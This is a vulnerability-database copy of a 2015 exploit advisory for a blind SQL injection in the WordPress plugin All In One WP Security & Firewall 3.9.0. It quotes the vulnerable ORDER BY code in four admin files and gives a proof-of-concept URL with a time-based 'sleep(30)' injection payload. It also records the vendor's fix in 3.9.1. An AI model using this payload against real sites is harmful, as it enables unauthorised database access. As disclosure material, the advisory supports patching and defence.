Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerability

🗓️ 08 Apr 2015 00:00:00Reported by Claudio VivianiType 
zdt
 zdt🔗 0day.today👁 28 Views

WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerabilit

Code
######################
 
# Exploit Title : WordPress All In One WP Security & Firewall 3.9.0 SQL Injection Vulnerability
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
 
# Software Link : https://mega.co.nz/#!DJAEBLBS!IBiukGo-pirelHmsRV80xZDHIvpqZKtTIqsD8YrMf7U
 
# Date : 2015-04-05
 
# Tested on : Linux / Mozilla Firefox
  
######################
 
# Description
 
 WordPress All In One WP Security & Firewall 3.9.0 suffers from Blind SQL Injection vulnerability
  
 There are some pages with wordpress esc_sql function.
 esc_sql is prone to Blind SQL Injection (discovered by Ryan Dewhurst - http://dewhurstsecurity.com/)
  
 isset($_GET["orderby"]) ? $orderby = strip_tags($_GET["orderby"]): $orderby = '';
 isset($_GET["order"]) ? $order = strip_tags($_GET["order"]): $order = '';
  
 - admin/wp-security-list-404.php
  
 $orderby = !empty($orderby) ? esc_sql($orderby) : 'id';
 $order = !empty($order) ? esc_sql($order) : 'DESC';
 ...
 ...
 $data = $wpdb->get_results("SELECT * FROM $events_table_name ORDER BY $orderby $order", ARRAY_A);
  
  
 - admin/wp-security-list-login-fails.php
  
 $orderby = !empty($orderby) ? esc_sql($orderby) : 'failed_login_date';
 $order = !empty($order) ? esc_sql($order) : 'DESC';
  
 $data = $wpdb->get_results("SELECT * FROM $failed_logins_table_name ORDER BY $orderby $order", ARRAY_A);
  
  
 - admin/wp-security-list-acct-activity-php
  
 $orderby = !empty($orderby) ? esc_sql($orderby) : 'login_date';
 $order = !empty($order) ? esc_sql($order) : 'DESC';
  
 $data = $wpdb->get_results("SELECT * FROM $login_activity_table ORDER BY $orderby $order LIMIT 50", ARRAY_A)
  
  
 - admin/wp-security-list-locked-ip.php
  
 $orderby = !empty($orderby) ? esc_sql($orderby) : 'failed_login_date';
 $order = !empty($order) ? esc_sql($order) : 'DESC';
  
 $data = $wpdb->get_results("SELECT * FROM $lockdown_table_name WHERE release_date > now() ORDER BY $orderby $order", ARRAY_A)
 
######################
 
# PoC
 
 http://VICTIM//wp-admin/admin.php?page=aiowpsec&tab=tab3&orderby=user_id,(select * from (select(sleep(30)))a)&order=asc
 
 
######################
 
# Vulnerability Disclosure Timeline:
 
2015-04-05: Discovered vulnerability
2015-04-06: Vendor Notification
2015-04-06: Vendor Response/Feedback
2015-04-07: Vendor Send Fix/Patch (3.9.1)
2015-04-07: Public Disclosure

#  0day.today [2018-01-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Apr 2015 00:00Current
7.1High risk
Vulners AI Score7.1
wordpresssecurityfirewallsql injectionvulnerabilityesc sqlblind sql injectionvendorpatch0day today
28